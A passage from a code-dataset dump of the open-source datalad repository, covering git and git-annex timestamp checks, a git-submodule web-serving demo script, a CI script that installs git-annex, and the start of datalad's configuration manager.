Note: By design a blob isn't tied to a particular file name;\n the returned file name matches what is returned by 'git rev-list'.\n \"\"\"\n # Note: This might be nicer with rev-list's --filter and\n # --filter-print-omitted, but those aren't available until Git v2.16.\n lines = repo.call_git_items_([\"rev-list\", \"--objects\"] + [branch],\n read_only=True)\n # Trees and blobs have an associated path printed.\n objects = (ln.split() for ln in lines)\n blob_trees = [obj for obj in objects if len(obj) == 2]\n\n num_objects = len(blob_trees)\n\n log_progress(lgr.info, \"repodates_branch_blobs\",\n \"Checking %d objects\", num_objects,\n label=\"Checking objects\", total=num_objects, unit=\" objects\")\n # This is inefficient. It makes a git call for each object, some of which\n # aren't even blobs. We could instead use 'git cat-file --batch'.\n for obj, fname in blob_trees:\n log_progress(lgr.info, \"repodates_branch_blobs\",\n \"Checking %s\", obj,\n increment=True, update=1)\n content = _cat_blob(repo, obj, bad_ok=True)\n if content:\n yield obj, content, fname\n log_progress(lgr.info, \"repodates_branch_blobs\",\n \"Finished checking %d objects\", num_objects)\n\n\ndef branch_blobs_in_tree(repo, branch):\n \"\"\"Get all blobs for the current tree of `branch`.\n\n Parameters\n ----------\n repo : GitRepo\n branch : str, optional\n\n Returns\n -------\n A generator object that returns (hexsha, content, file name) for each blob.\n Note: If there are multiple files in the tree that point to the blob, only\n the first file name that is reported by 'git ls-tree' is used (i.e., one\n entry per blob is yielded).\n \"\"\"\n seen_blobs = set()\n lines = list(repo.call_git_items_([\"ls-tree\", \"-z\", \"-r\", branch],\n sep=\"\\0\", read_only=True))\n if lines:\n num_lines = len(lines)\n log_progress(lgr.info,\n \"repodates_blobs_in_tree\",\n \"Checking %d objects in git-annex tree\", num_lines,\n label=\"Checking objects\", total=num_lines,\n unit=\" objects\")\n for line in lines:\n if not line:\n continue\n _, obj_type, obj, fname = line.split()\n log_progress(lgr.info, \"repodates_blobs_in_tree\",\n \"Checking %s\", obj,\n increment=True, update=1)\n if obj_type == \"blob\" and obj not in seen_blobs:\n yield obj, _cat_blob(repo, obj), fname\n seen_blobs.add(obj)\n log_progress(lgr.info, \"repodates_blobs_in_tree\",\n \"Finished checking %d blobs\", num_lines)\n\n\n# In uuid.log, timestamps look like \"timestamp=1523283745.683191724s\" and occur\n# at the end of the line. 
In the *.log and *.log.meta files that are\n# associated with annexed files, the timestamps occur at beginning of the line\n# and don't have the \"timestamp=\" prefix.\nANNEX_DATE_RE = re.compile(r\"^(?:[^\\n]+timestamp=)?([0-9]+)(?:\\.[0-9]+)?s\",\n re.MULTILINE)\n\n\ndef search_annex_timestamps(text):\n \"\"\"Extract unix timestamps content of the git-annex branch.\n\n Parameters\n ----------\n text : str\n Content from the git-annex branch (e.g., the content of the \"uuid.log\"\n file).\n\n Returns\n -------\n A generator object that returns a unix timestamp (without fractional any\n seconds) for each timestamp found in `text`.\n \"\"\"\n for match in ANNEX_DATE_RE.finditer(text):\n yield int(match.group(1))\n\n\ndef annex_dates(repo, all_objects=True):\n \"\"\"Get git-annex branch blobs containing dates.\n\n Parameters\n ----------\n repo : GitRepo\n all_objects : bool, optional\n Instead for searching the content of all blobs in the git-annex branch,\n search only the blobs that are in the tree of the tip of the git-annex\n branch.\n\n Returns\n -------\n A generator object that returns a tuple with the blob hexsha, a generator\n with the blob's timestamps, and an associated file name.\n \"\"\"\n blob_fn = branch_blobs if all_objects else branch_blobs_in_tree\n for hexsha, content, fname in blob_fn(repo, \"git-annex\"):\n yield hexsha, search_annex_timestamps(content), fname\n\n\ndef tag_dates(repo, pattern=\"\"):\n \"\"\"Get timestamps for annotated tags.\n\n Parameters\n ----------\n repo : GitRepo\n pattern : str\n Limit the tags by this pattern. It will be appended to 'refs/tags'\n argument passed to `git for-each-ref`.\n\n Returns\n -------\n A generator object that returns a tuple with the tag hexsha and timestamp.\n \"\"\"\n for rec in repo.for_each_ref_(\n fields=['objectname', 'taggerdate:raw'],\n pattern='refs/tags/' + pattern):\n if not rec['taggerdate:raw']:\n # There's not a tagger date. It's not an annotated tag.\n continue\n yield rec['objectname'], int(rec['taggerdate:raw'].split()[0])\n\n\ndef log_dates(repo, revs=None):\n \"\"\"Get log timestamps.\n\n Parameters\n ----------\n repo : GitRepo\n revs : list, optional\n Extract timestamps from commit objects that are reachable from these\n revisions.\n\n Returns\n -------\n A generator object that returns a tuple with the commit hexsha, author\n timestamp, and committer timestamp.\n \"\"\"\n opts = [] if revs else [\"--branches\"]\n try:\n for line in repo.get_revisions(revs, fmt=\"%H %at %ct\", options=opts):\n hexsha, author_timestamp, committer_timestamp = line.split()\n yield hexsha, int(author_timestamp), int(committer_timestamp)\n except CommandError as e:\n # With some Git versions, calling `git log --{all,branches,remotes}` in\n # a repo with no commits may signal an error.\n if \"does not have any commits yet\" not in e.stderr:\n raise e\n\n\ndef check_dates(repo, timestamp=None, which=\"newer\", revs=None,\n annex=True, tags=True):\n \"\"\"Search for dates in `repo` that are newer than `timestamp`.\n\n This examines commit logs of local branches and the content of blobs in the\n git-annex branch.\n\n Parameters\n ----------\n repo : GitRepo or str\n If a str is passed, it is taken as the path to a GitRepo.\n timestamp : int, optional\n Unix timestamp. It defaults to a day before now.\n which : {\"newer\", \"older\"}\n Whether to return timestamps that are newer or older than `timestamp`.\n revs : list, optional\n Search for commit timestamps in commits that are area reachable from\n these revisions. 
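To illustrate the `search_annex_timestamps` helper defined above, a minimal sketch with a fabricated uuid.log-style line (the UUID, remote name, and timestamp are invented):

    from datalad.support.repodates import search_annex_timestamps

    line = "00000000-0000-0000-0000-000000000001 my-laptop timestamp=1523283745.683191724s"
    # fractional seconds are dropped; only the integer part is reported
    print(list(search_annex_timestamps(line)))  # [1523283745]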
Any revision-specification allowed by `git log` can be\n used, including things like `--all`. Defaults to all local branches.\n annex : {True, \"tree\", False}, optional\n If True, search the content of all blobs in the git-annex branch. If\n \"tree\", search only the blobs that are in the tree of the tip of the\n git-annex branch. If False, do not search git-annex blobs.\n tags : bool, optional\n Whether to check dates the dates of annotated tags.\n\n Returns\n -------\n A dict that reports newer timestamps.\n \"\"\"\n if isinstance(repo, str):\n repo = GitRepo(repo, create=False)\n\n if timestamp is None:\n timestamp = int(time.time()) - 60 * 60 * 24\n\n if which == \"newer\":\n cmp_fn = operator.gt\n elif which == \"older\":\n cmp_fn = operator.lt\n else:\n raise ValueError(\"unrecognized value for `which`: {}\".format(which))\n\n results = {}\n\n lgr.debug(\"Checking dates in logs\")\n for hexsha, a_timestamp, c_timestamp in log_dates(repo, revs=revs):\n if cmp_fn(a_timestamp, timestamp) or cmp_fn(c_timestamp, timestamp):\n results[hexsha] = {\"type\": \"commit\",\n \"author-timestamp\": a_timestamp,\n \"committer-timestamp\": c_timestamp}\n\n if tags:\n lgr.debug(\"Checking dates of annotated tags\")\n for hexsha, tag_timestamp in tag_dates(repo):\n if cmp_fn(tag_timestamp, timestamp):\n results[hexsha] = {\"type\": \"tag\",\n \"timestamp\": tag_timestamp}\n\n if annex and \"git-annex\" in repo.get_branches():\n all_objects = annex != \"tree\"\n lgr.debug(\"Checking dates in blobs of git-annex branch%s\",\n \"\" if all_objects else \"'s tip\")\n for hexsha, timestamps, fname in annex_dates(repo, all_objects):\n hits = [ts for ts in timestamps if cmp_fn(ts, timestamp)]\n if hits:\n results[hexsha] = {\"type\": \"annex-blob\",\n \"timestamps\": hits,\n \"filename\": fname}\n\n return {\"reference-timestamp\": timestamp,\n \"which\": which,\n \"objects\": results}\n" }, { "alpha_fraction": 0.6812412142753601, "alphanum_fraction": 0.7033380270004272, "avg_line_length": 22.36263656616211, "blob_id": "bcdc8a3d10cbbb8df4bf09648acca9d3a7ab1419", "content_id": "7b899a9a4476e551acd5b3e36303173c683a1383", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2127, "license_type": "permissive", "max_line_length": 131, "num_lines": 91, "path": "/tools/git-web-submodules.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Helper to replicate and demonstrate problem with git submodules being shared\n# as non-bare repos on the web\n\nset -eu\n\ntopd=/tmp/gitxxmsxYFO #$(tempfile --prefix gitxxx)\ntopd2=${topd}_\ntopd3=${topd}__\necho \"I: directory $topd\"\nrm -rf \"$topd\" \"$topd2\" \"$topd3\"\n\ngitcommit () {\n git commit \"$@\"\n # manually since we aren't pushing to it atm\n git update-server-info\n}\n\ngitinit () {\n git init\n # make it servable from the web\n mv .git/hooks/post-update.sample .git/hooks/post-update\n}\n\ngitaddfile() {\n echo $1 > $1\n git add $1\n gitcommit -m \"added $1\"\n}\n\nstartwebserver() {\n python -m SimpleHTTPServer 8080 2>&1 | sed -e 's,^, WEB: ,g' &\n sleep 1 # to give it time to start\n}\n\n# Initiate a repo with a submodule with relative path\nmkdir $topd\ncd $topd\nmkdir -p $topd\ngitinit\ngitaddfile f1\n\nmkdir sub1\ncd sub1\ngitinit\ngitaddfile f2\ncd ..\n\ngit submodule add ./sub1 sub1\ngitcommit -m 'Added sub1 submodule' -a\n\n# Expose under the webserver\nstartwebserver\n\n# Try to clone and update submodule\ngit clone http://localhost:8080/.git 
$topd2\ncd $topd2\n# and initialize submodule\ngit submodule update --init || echo \"E: FAILED!\"\n\n# but we can still do it if we adjust the url for already inited submodule\nsed -i -e 's|/.git/sub1|/sub1/.git|g' .git/config\ngit submodule update --init\necho \"I: SUCCESS and the content of file is ...\"\ncd sub1\ncat f2\n# so we could serve later as well\ngit update-server-info\ncd ..\ngit update-server-info\n# kill the webserver\nkill %1\nsleep 1\n\necho \"I: now trying to serve the cloned repo which has a gitlink for sub1/.git\"\n# Expose under the webserver\nstartwebserver\n\n# Try to clone and update submodule\ngit clone http://localhost:8080/.git $topd3\ncd $topd3\n# and initialize submodule\ngit submodule update --init || echo \"E: FAILED!\"\n\n# but we can still do it if we adjust the url for already inited submodule\nsed -i -e 's|/.git/sub1|/sub1/.git|g' .git/config\ngit submodule update --init || echo \"E: Remains broken, I guess due to sub1/.git being a gitlink and git not following its pointer\"\n#echo \"I: SUCCESS and the content of file is ...\"\n#cat sub1/f2\n\nkill %1\n\n" }, { "alpha_fraction": 0.5515487194061279, "alphanum_fraction": 0.5577661991119385, "avg_line_length": 30.592857360839844, "blob_id": "f02f4aae7d22607612b7e1a72bd0802cf6613f7f", "content_id": "a481caeca97fa8f4e11782d316ae007525179bc8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 8846, "license_type": "permissive", "max_line_length": 153, "num_lines": 280, "path": "/tools/ci/install-annex.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# An ultimate helper to use to setup a CI with some git-annex installation\n# Arguments:\n# First argument would be which \"schema\" would it be.\n# Some schemas might like additional arguments.\n#\n# This script\n# - needs to be \"source\"d since some schemas would need to modify env vars\n# - might use \"sudo\" for some operations\n# - might exit with 0 if e.g. specific installation \"is not needed\" (e.g. devel annex == default annex)\n\nfunction _show_schemes() {\n _schemes_doc=(\n \"autobuild # Linux, macOS\"\n \"brew # macOS\"\n \"conda-forge [version] # Linux\"\n \"conda-forge-last [version] # Linux\"\n \"datalad-extensions-build # Linux, macOS\"\n \"deb-url URL # Linux\"\n \"neurodebian # Linux\"\n \"neurodebian-devel # Linux\"\n \"snapshot # Linux, macOS\"\n )\n for s in \"${_schemes_doc[@]}\"; do\n echo \" $s\"\n done\n\n}\n\nfunction _usage() {\n cat >&2 <<EOF\nusage: source $0 [--help] [--adjust-bashrc] [SCHEME [ARGS...]]\n\n*Options*\n --adjust-bashrc\n If the scheme tweaks PATH, prepend a snippet to ~/.bashrc that exports that\n path. 
Note: This should be positiioned before SCHEME.\n --help\n Display this help and exit.\n\n SCHEME\n Type of git-annex installation (default \"conda-forge\").\n\n$(_show_schemes)\nEOF\n}\n\nfunction setup_neurodebian_devel() {\n # configure\n sed -e 's,/debian ,/debian-devel ,g' /etc/apt/sources.list.d/neurodebian.sources.list | sudo tee /etc/apt/sources.list.d/neurodebian-devel.sources.list\n sudo apt-get update\n}\n\nfunction install_from_dmg() {\n hdiutil attach \"$1\"\n rsync -a /Volumes/git-annex/git-annex.app /Applications/\n hdiutil detach /Volumes/git-annex/\n _annex_bin=/Applications/git-annex.app/Contents/MacOS\n export PATH=\"$_annex_bin:$PATH\"\n}\n\n_conda_annex_version=\nscenario=\"conda-forge\"\nadjust_bashrc=\nurl=\nwhile [ $# != 0 ]; do\n case \"$1\" in\n --adjust-bashrc)\n adjust_bashrc=1\n shift\n ;;\n --help)\n _usage\n exit 0\n ;;\n -*)\n _usage\n exit 1\n ;;\n *)\n scenario=\"$1\"\n shift\n case \"$scenario\" in\n neurodebian|neurodebian-devel|autobuild|snapshot|datalad-extensions-build|brew)\n ;;\n conda-forge|conda-forge-last)\n if [ -n \"$1\" ]; then\n _conda_annex_version=\"=$1\"\n shift\n fi\n ;;\n deb-url)\n url=\"${1?deb-url scheme requires URL}\"\n shift\n ;;\n *)\n echo \"Unknown git-annex installation scheme '$scenario'\" >&2\n echo \"Known schemes:\" >&2\n _show_schemes >&2\n exit 1\n ;;\n esac\n if [ -n \"$1\" ]; then\n # There are unexpected arguments left over.\n _usage\n exit 1\n fi\n ;;\n esac\ndone\n\n_this_dir=$(dirname \"$0\")\n\n# Most common location of installation - /usr/bin\n_annex_bin=/usr/bin\n\n_PATH_OLD=\"$PATH\"\n\n# we do not want to `cd` anywhere but all temp stuff should get unique temp prefix\n_TMPDIR=$(mktemp -d \"${TMPDIR:-/tmp}/ga-XXXXXXX\")\necho \"I: top directory $_TMPDIR\"\n\ncase \"$scenario\" in\n neurodebian) # TODO: use nd_freeze_install for an arbitrary version specified\n # we assume neurodebian is generally configured\n sudo apt-get install git-annex-standalone\n ;;\n neurodebian-devel)\n # if debian-devel is not setup -- set it up\n apt-cache policy git-annex-standalone | grep -q '/debian-devel ' \\\n || setup_neurodebian_devel\n # check versions\n # devel:\n devel_annex_version=$(apt-cache policy git-annex-standalone | grep -B1 '/debian-devel ' | awk '/ndall/{print $1;}')\n current_annex_version=$(apt-cache policy git-annex-standalone | awk '/\\*\\*\\*/{print $2}')\n\n if dpkg --compare-versions \"$devel_annex_version\" gt \"$current_annex_version\"; then\n sudo apt-get install \"git-annex-standalone=$devel_annex_version\"\n else\n echo \"I: devel version $devel_annex_version is not newer than installed $current_annex_version\"\n exit 0\n fi\n ;;\n deb-url)\n (\n wget -O \"$_TMPDIR/git-annex.deb\" \"$url\"\n sudo dpkg -i \"$_TMPDIR/git-annex.deb\"\n )\n ;;\n autobuild|snapshot)\n case \"$(uname)\" in\n Linux)\n _annex_bin=\"$_TMPDIR/git-annex.linux\"\n echo \"I: downloading and extracting under $_annex_bin\"\n case \"$scenario\" in\n autobuild)\n _subpath=autobuild/amd64\n ;;\n snapshot)\n _subpath=linux/current\n ;;\n *)\n echo \"E: internal error: scenario '$scenario' should not reach here\" >&2\n exit 1\n ;;\n esac\n tar -C \"$_TMPDIR\" -xzf <(\n wget -q -O- https://downloads.kitenet.net/git-annex/$_subpath/git-annex-standalone-amd64.tar.gz\n )\n export PATH=\"${_annex_bin}:$PATH\"\n ;;\n Darwin)\n case \"$scenario\" in\n autobuild)\n _subpath=autobuild/x86_64-apple-yosemite\n ;;\n snapshot)\n _subpath=OSX/current/10.10_Yosemite\n ;;\n *)\n echo \"E: internal error: scenario '$scenario' should not reach here\" >&2\n 
exit 1\n ;;\n esac\n wget -q -O \"$_TMPDIR/git-annex.dmg\" https://downloads.kitenet.net/git-annex/$_subpath/git-annex.dmg\n install_from_dmg \"$_TMPDIR\"/*.dmg\n ;;\n *)\n echo \"E: Unsupported OS: $(uname)\"\n exit 1\n ;;\n esac\n ;;\n conda-forge|conda-forge-last)\n _miniconda_script=Miniconda3-latest-Linux-x86_64.sh\n _conda_bin=\"$_TMPDIR/miniconda/bin\"\n # we will symlink git-annex only under a didicated directory, so it could be\n # used with default Python etc. If names changed here, possibly adjust hardcoded\n # duplicates below where we establish relative symlinks\n _annex_bin=\"$_TMPDIR/annex-bin\"\n case \"$scenario\" in\n conda-forge-last)\n if hash git-annex; then\n echo \"W: git annex already installed. In this case this setup has no sense\" >&2\n exit 1\n fi\n # We are interested only to get git-annex into our environment\n # So to not interfere with \"system wide\" Python etc, we will add miniconda at the\n # end of the path\n export PATH=\"$PATH:${_annex_bin}\";;\n conda-forge)\n export PATH=\"${_annex_bin}:$PATH\";;\n *)\n echo \"E: internal error - $scenario is unknown\"\n exit 1;;\n esac\n\n echo \"I: downloading and running miniconda installer\"\n wget -q -O \"$_TMPDIR/${_miniconda_script}\" \\\n \"${ANACONDA_URL:-https://repo.anaconda.com/miniconda/}${_miniconda_script}\"\n HOME=\"$_TMPDIR\" bash \"$_TMPDIR/${_miniconda_script}\" -b -p \"$_TMPDIR/miniconda\"\n \"${_conda_bin}/conda\" install -q -c conda-forge -y \"git-annex${_conda_annex_version}\"\n\n if [[ \"$_annex_bin\" != \"$_conda_bin\" ]]; then\n mkdir -p \"$_annex_bin\"\n (\n cd \"$_annex_bin\" || exit 1\n ln -s ../miniconda/bin/git-annex* .\n )\n fi\n unset _miniconda_script\n unset _conda_bin\n unset _conda_annex_version\n ;;\n datalad-extensions-build)\n case \"$(uname)\" in\n Linux)\n TARGET_PATH=\"$_TMPDIR\" \"$_this_dir/download-latest-artifact\"\n sudo dpkg -i \"$_TMPDIR\"/*.deb\n ;;\n Darwin)\n TARGET_PATH=\"$_TMPDIR\" TARGET_ARTIFACT=git-annex-macos-dmg \"$_this_dir/download-latest-artifact\"\n install_from_dmg \"$_TMPDIR\"/*.dmg\n ;;\n *)\n echo \"E: Unsupported OS: $(uname)\"\n exit 1\n ;;\n esac\n ;;\n brew)\n brew install git-annex\n _annex_bin=/usr/local/bin\n ;;\n *)\n echo \"E: internal error: '$scenario' should be handled above\" >&2\n exit 1\nesac\n\nif [ -n \"$adjust_bashrc\" ]; then\n # If PATH was changed, we need to make it available to SSH commands.\n # Note: Prepending is necessary. SSH commands load .bashrc, but many\n # distributions (including Debian and Ubuntu) come with a snippet to exit\n # early in that case.\n if [ \"$PATH\" != \"$_PATH_OLD\" ]; then\n perl -pli -e 'print \"PATH=\\\"$ENV{PATH}\\\"\" if $. 
== 1' ~/.bashrc\n echo \"I: Adjusted first line of ~/.bashrc:\"\n head -n1 ~/.bashrc\n fi\nfi\n\n# Rudimentary test of installation and inform user about location\ntest -x \"${_annex_bin}/git-annex\"\ntest -x \"${_annex_bin}/git-annex-shell\"\necho \"I: git-annex is available under '${_annex_bin}'\"\n\nunset _annex_bin\nunset _show_schemes\nunset _this_dir\n" }, { "alpha_fraction": 0.5758585929870605, "alphanum_fraction": 0.5772457718849182, "avg_line_length": 37.29905700683594, "blob_id": "fc758baa22c2936333829d6fc600567eef7edcc3", "content_id": "0e9ed23432e865d78f94d49c49a24bc25f872856", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 44695, "license_type": "permissive", "max_line_length": 98, "num_lines": 1167, "path": "/datalad/config.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport re\nimport threading\nimport warnings\nfrom collections import namedtuple\nfrom fasteners import InterProcessLock\nfrom functools import (\n lru_cache,\n wraps,\n)\nfrom pathlib import Path\n\n\nimport datalad\nfrom datalad.consts import DATASET_CONFIG_FILE\nfrom datalad.runner import (\n CommandError,\n GitRunner,\n KillOutput,\n StdOutErrCapture,\n)\nfrom datalad.utils import (\n getpwd,\n on_windows,\n)\n\nlgr = logging.getLogger('datalad.config')\n\n# git-config key syntax with a section and a subsection\n# see git-config(1) for syntax details\ncfg_k_regex = re.compile(r'([a-zA-Z0-9-.]+\\.[^\\0\\n]+)$', flags=re.MULTILINE)\n# identical to the key regex, but with an additional group for a\n# value in a null-delimited git-config dump\ncfg_kv_regex = re.compile(\n r'([a-zA-Z0-9-.]+\\.[^\\0\\n]+)\\n(.*)$',\n flags=re.MULTILINE | re.DOTALL\n)\ncfg_section_regex = re.compile(r'(.*)\\.[^.]+')\ncfg_sectionoption_regex = re.compile(r'(.*)\\.([^.]+)')\n\n\n_scope_reload_doc = \"\"\"\n scope : {'branch', 'local', 'global', 'override'}, optional\n Indicator which configuration file to modify. 'branch' indicates the\n persistent configuration in .datalad/config of a dataset; 'local'\n the configuration of a dataset's Git repository in .git/config;\n 'global' refers to the general configuration that is not specific to\n a single repository (usually in $USER/.gitconfig); 'override'\n limits the modification to the ConfigManager instance, and the\n assigned value overrides any setting from any other source.\n Note: 'dataset' is being DEPRECATED in favor of 'branch'.\n where: {'branch', 'local', 'global', 'override'}, optional\n DEPRECATED, use 'scope'.\n reload : bool\n Flag whether to reload the configuration from file(s) after\n modification. 
This can be disable to make multiple sequential\n modifications slightly more efficient.\"\"\".lstrip()\n\n# Selection of os.stat_result fields we care to collect/compare to judge\n# on either file has changed to warrant reload of configuration.\n_stat_result = namedtuple('_stat_result', 'st_ino st_size st_ctime st_mtime')\n\n\n# we cannot import external_versions here, as the cfg comes before anything\n# and we would have circular imports\n@lru_cache()\ndef get_git_version(runner=None):\n \"\"\"Return version of available git\"\"\"\n runner = runner or GitRunner()\n return runner.run('git version'.split(),\n protocol=StdOutErrCapture)['stdout'].split()[2]\n\n\ndef _scope_reload(obj):\n \"\"\"Helper decorator to simplify providing repetitive docstring\"\"\"\n obj.__doc__ = obj.__doc__ % _scope_reload_doc\n return obj\n\n\n#\n# TODO: remove when deprecated 'where' is removed. Some time >= 0.17\n#\ndef _where_to_scope(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n if 'where' in kwargs:\n if 'scope' in kwargs:\n raise ValueError(\"Do not specify both 'scope' and DEPRECATED 'where'\")\n kwargs = kwargs.copy()\n where = kwargs.pop('where')\n if where == 'dataset':\n warnings.warn(\"'where=\\\"dataset\\\"' is deprecated, use 'scope=\\\"branch\\\"' instead\",\n DeprecationWarning)\n where = 'branch'\n else:\n warnings.warn(\"'where' is deprecated, use 'scope' instead\",\n DeprecationWarning)\n kwargs['scope'] = where\n return func(*args, **kwargs)\n return wrapper\n\n\ndef parse_gitconfig_dump(dump, cwd=None, multi_value=True):\n \"\"\"Parse a dump-string from `git config -z --list`\n\n This parser has limited support for discarding unrelated output\n that may contaminate the given dump. It does so performing a\n relatively strict matching of configuration key syntax, and discarding\n lines in the output that are not valid git-config keys.\n\n There is also built-in support for parsing outputs generated\n with --show-origin (see return value).\n\n Parameters\n ----------\n dump : str\n Null-byte separated output\n cwd : path-like, optional\n Use this absolute path to convert relative paths for origin reports\n into absolute paths. By default, the process working directory\n PWD is used.\n multi_value : bool, optional\n If True, report values from multiple specifications of the\n same key as a tuple of values assigned to this key. Otherwise,\n the last configuration is reported.\n\n Returns:\n --------\n dict, set\n Configuration items are returned as key/value pairs in a dictionary.\n The second tuple-item will be a set of identifiers comprising all\n source files/blobs, if origin information was included\n in the dump (--show-origin). 
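A minimal sketch of feeding this parser a tiny hand-written dump in the null-delimited form produced by `git config -z --list` (the keys and values are made up, and no origin information is included):

    from datalad.config import parse_gitconfig_dump

    dump = "user.name\nDataLad Tester\0user.email\[email protected]\0"
    cfg, origins = parse_gitconfig_dump(dump)
    print(cfg["user.name"])  # 'DataLad Tester'
    print(origins)           # set(), since this dump carries no --show-origin info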
An empty set is returned otherwise.\n For actual files a Path object is included in the set, for a git-blob\n a Git blob ID prefixed with 'blob:' is reported.\n \"\"\"\n cwd = Path(getpwd() if cwd is None else cwd)\n dct = {}\n fileset = set()\n for line in dump.split('\\0'):\n # line is a null-delimited chunk\n k = None\n # in anticipation of output contamination, process within a loop\n # where we can reject non syntax compliant pieces\n while line:\n if line.startswith('file:') or line.startswith('blob:'):\n fileset.add(line)\n break\n if line.startswith('command line:'):\n # no origin that we could as a pathobj\n break\n # try getting key/value pair from the present chunk\n k, v = _gitcfg_rec_to_keyvalue(line)\n if k is not None:\n # we are done with this chunk when there is a good key\n break\n # discard the first line and start over\n ignore, line = line.split('\\n', maxsplit=1)\n lgr.debug('Non-standard git-config output, ignoring: %s', ignore)\n if not k:\n # nothing else to log, all ignored dump was reported before\n continue\n # multi-value reporting\n present_v = dct.get(k, None)\n if present_v is None or not multi_value:\n dct[k] = v\n else:\n if isinstance(present_v, tuple):\n dct[k] = present_v + (v,)\n else:\n dct[k] = (present_v, v)\n # take blobs with verbatim markup\n origin_blobs = set(f for f in fileset if f.startswith('blob:'))\n # convert file specifications to Path objects with absolute paths\n origin_paths = set(Path(f[5:]) for f in fileset if f.startswith('file:'))\n origin_paths = set(f if f.is_absolute() else cwd / f for f in origin_paths)\n return dct, origin_paths.union(origin_blobs)\n\n\n# keep alias with previous name for now\n_parse_gitconfig_dump = parse_gitconfig_dump\n\n\ndef _gitcfg_rec_to_keyvalue(rec):\n \"\"\"Helper for parse_gitconfig_dump()\n\n Parameters\n ----------\n rec: str\n Key/value specification string\n\n Returns\n -------\n str, str\n Parsed key and value. Key and/or value could be None\n if not syntax-compliant (former) or absent (latter).\n \"\"\"\n kv_match = cfg_kv_regex.match(rec)\n if kv_match:\n k, v = kv_match.groups()\n elif cfg_k_regex.match(rec):\n # could be just a key without = value, which git treats as True\n # if asked for a bool\n k, v = rec, None\n else:\n # no value, no good key\n k = v = None\n return k, v\n\n\ndef _update_from_env(store):\n overrides = {}\n dct = {}\n for k in os.environ:\n if k == \"DATALAD_CONFIG_OVERRIDES_JSON\":\n try:\n overrides = json.loads(os.environ[k])\n except json.decoder.JSONDecodeError as exc:\n lgr.warning(\"Failed to load DATALAD_CONFIG_OVERRIDES_JSON: %s\",\n exc)\n elif k.startswith('DATALAD_'):\n dct[k.replace('__', '-').replace('_', '.').lower()] = os.environ[k]\n if overrides:\n store.update(overrides)\n store.update(dct)\n\n\ndef anything2bool(val):\n if hasattr(val, 'lower'):\n val = val.lower()\n if val in {\"off\", \"no\", \"false\", \"0\"} or not bool(val):\n return False\n elif val in {\"on\", \"yes\", \"true\", True} \\\n or (hasattr(val, 'isdigit') and val.isdigit() and int(val)) \\\n or isinstance(val, int) and val:\n return True\n else:\n raise TypeError(\n \"Got value %s which could not be interpreted as a boolean\"\n % repr(val))\n\n\nclass ConfigManager(object):\n \"\"\"Thin wrapper around `git-config` with support for a dataset configuration.\n\n The general idea is to have an object that is primarily used to read/query\n configuration option. 
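For the `anything2bool` helper defined just above, a few representative coercions (the inputs are arbitrary examples):

    from datalad.config import anything2bool

    print(anything2bool("yes"))   # True
    print(anything2bool("off"))   # False
    print(anything2bool("0"))     # False
    print(anything2bool(2))       # True, any non-zero integer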
Upon creation, current configuration is read via one\n (or max two, in the case of the presence of dataset-specific configuration)\n calls to `git config`. If this class is initialized with a Dataset\n instance, it supports reading and writing configuration from\n ``.datalad/config`` inside a dataset too. This file is committed to Git and\n hence useful to ship certain configuration items with a dataset.\n\n The API aims to provide the most significant read-access API of a\n dictionary, the Python ConfigParser, and GitPython's config parser\n implementations.\n\n This class is presently not capable of efficiently writing multiple\n configurations items at once. Instead, each modification results in a\n dedicated call to `git config`. This author thinks this is OK, as he\n cannot think of a situation where a large number of items need to be\n written during normal operation.\n\n Each instance carries a public `overrides` attribute. This dictionary\n contains variables that override any setting read from a file. The overrides\n are persistent across reloads.\n\n Any DATALAD_* environment variable is also presented as a configuration\n item. Settings read from environment variables are not stored in any of the\n configuration files, but are read dynamically from the environment at each\n `reload()` call. Their values take precedence over any specification in\n configuration files, and even overrides.\n\n Parameters\n ----------\n dataset : Dataset, optional\n If provided, all `git config` calls are executed in this dataset's\n directory. Moreover, any modifications are, by default, directed to\n this dataset's configuration file (which will be created on demand)\n overrides : dict, optional\n Variable overrides, see general class documentation for details.\n source : {'any', 'local', 'branch', 'branch-local'}, optional\n Which sources of configuration setting to consider. 
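The DATALAD_* variable mapping mentioned above follows the rule applied by `_update_from_env`: '__' becomes '-', remaining '_' become '.', and the name is lowercased. A short sketch (the second variable name is invented):

    for name in ("DATALAD_TESTS_TEMP_DIR", "DATALAD_FANCY__OPTION"):
        print(name.replace('__', '-').replace('_', '.').lower())
    # -> datalad.tests.temp.dir
    # -> datalad.fancy-option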
If 'branch',\n configuration items are only read from a dataset's persistent\n configuration file in current branch, if any is present\n (the one in ``.datalad/config``, not\n ``.git/config``); if 'local', any non-committed source is considered\n (local and global configuration in Git config's terminology);\n if 'branch-local', persistent configuration in current dataset branch\n and local, but not global or system configuration are considered; if 'any'\n all possible sources of configuration are considered.\n Note: 'dataset' and 'dataset-local' are deprecated in favor of 'branch'\n and 'branch-local'.\n \"\"\"\n # Lock for running changing operation across multiple threads.\n # Since config itself to the same path could\n # potentially be created independently in multiple threads, and we might be\n # modifying global config as well, making lock static should not allow more than\n # one thread to write at a time, even if to different repositories.\n _run_lock = threading.Lock()\n\n def __init__(self, dataset=None, overrides=None, source='any'):\n # TODO: remove along with the removal of deprecated 'where'\n if source in ('dataset', 'dataset-local'):\n source_new = source.replace('dataset', 'branch')\n warnings.warn(\"'source=\\\"%s\\\"' is deprecated, use 'source=\\\"%s\\\"' instead\"\n % (source, source_new),\n DeprecationWarning)\n source = source_new\n\n if source not in ('any', 'local', 'branch', 'branch-local'):\n raise ValueError(\n 'Unknown ConfigManager(source=) setting: {}'.format(source))\n store = dict(\n # store in a 